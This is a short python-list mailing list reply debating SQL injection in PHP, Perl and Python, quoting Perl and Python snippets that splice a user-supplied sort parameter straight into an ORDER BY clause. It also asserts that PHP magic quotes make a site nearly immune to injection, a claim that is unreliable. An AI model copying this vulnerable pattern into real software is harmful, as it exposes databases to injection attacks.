John Bokma wrote:
my $sort = $cgi->param( "sort" ); my $query = "SELECT * FROM table WHERE id=? ORDER BY $sort";
And the equivalent Python code:
cursor.execute('SELECT * FROM table WHERE id=%%s ORDER BY %s' % sort, [some_id])
You're right, of course, about being *able* to write code with SQL injection vulnerabilities in Python. But it's not even close to being as easy as in PHP.
I'm bewildered why you haven't mentioned magic quotes. A one line change to the configuration file can render your PHP site almost entirely immune to SQL injection attacks.
-Peter
-- Pull out a splinter to reply. -- http://mail.python.org/mailman/listinfo/python-list
